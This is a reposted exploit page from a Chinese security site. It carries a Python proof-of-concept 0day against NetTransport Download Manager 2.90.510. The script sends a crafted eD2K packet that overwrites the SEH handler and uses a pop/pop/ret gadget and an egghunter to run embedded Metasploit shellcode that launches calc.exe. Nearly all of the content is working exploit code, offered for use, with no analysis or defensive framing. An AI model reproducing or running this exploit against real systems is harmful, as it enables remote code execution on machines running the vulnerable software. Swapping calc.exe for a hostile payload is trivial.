首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
NetTransport Download Manager version:2.90.510 0day
来源:vfocus.net 作者: Lincoln 发布时间:2010-01-04   
#!/usr/bin/python

#########################
#NetTransport Download Manager version:2.90.510 0day
#Discovered by Lincoln
#Tested on Windows XP SP3
#
#eMule file sharing protocol
#SEH overwrite, leaves only 60 or so bytes after p/p/r
#egghunter is used to find sc (calc.exe)
#
#root@BT4VM:~# ./netxfer.py 192.168.1.8 31491
#########################

import socket,sys

host = sys.argv[1]
port = int(sys.argv[2]) #eD2K port

# * windows/exec - 200 bytes
# * http://www.metasploit.com
# * EXITFUNC=thread, CMD=calc.exe
sc = ("\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30"
"\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff"
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2"
"\xf0\x52\x57\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85"
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3"
"\x3c\x49\x8b\x34\x8b\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d"
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58"
"\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b"
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff"
"\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d\x6a\x01\x8d\x85\xb9\x00"
"\x00\x00\x50\x68\x31\x8b\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a"
"\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75"
"\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5\x63\x61\x6c\x63"
"\x2e\x65\x78\x65\x00")

#magic packet
buf = ("\xe3\x3d\x00\x00\x00\x01\xee\x4f\x08\xe3\x00\x0e\xae\x41\xb0\x24"
"\x89\x38\x1c\xc7\x6f\x6e\x00\x00\x00\x00\xaf\x8d\x04\x00\x00\x00"
"\x02\x01\x00\x01\x04\x00\x74\x65\x73\x74\x03\x01\x00\x11\x3c\x00")

#egg =  c00lc00l
egghunter = ("\x66\x81\xCA\xFF\x0F\x42\x52\x6A\x02\x58\xCD\x2E\x3C\x05\x5A\x74\xEF\xB8"
"\x63\x30\x30\x6c\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7")

#p/p/r 10002a57 libssl.dll
buf+= "\x41" * 119 + "\xeb\x06\x90\x90" + "\x57\x2a\x00\x10" + "\x90" * 10 + egghunter
buf+= "\x90" * 50 + "c00lc00l" + "\x90" * 20 + sc + "\x90" * 2000

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send(buf)
print "\nExploit Sent!! Give the egghunter a few seconds to find the shellcode\r\n"
s.close()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·HLstatsX Community Edition 1.6
·Proxyroll.com Clone PHP Script
·MP4 Player 4.0 Local Crash Poc
·php Banner Exchange v1.2 Arabi
·GOM player V 2.1.9 Local crash
·PHP File Uploader Shell Upload
·VSO Medoa Player Version 1.0.2
·pL-PHP beta 0.9 Cross Site Scr
·DZOIC ClipHouse suffer from au
·Serial Lib Arabic Version XSS
·Joomla Component com_avosbille
·Discuz! v5.0.0 Cross Site Scri
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved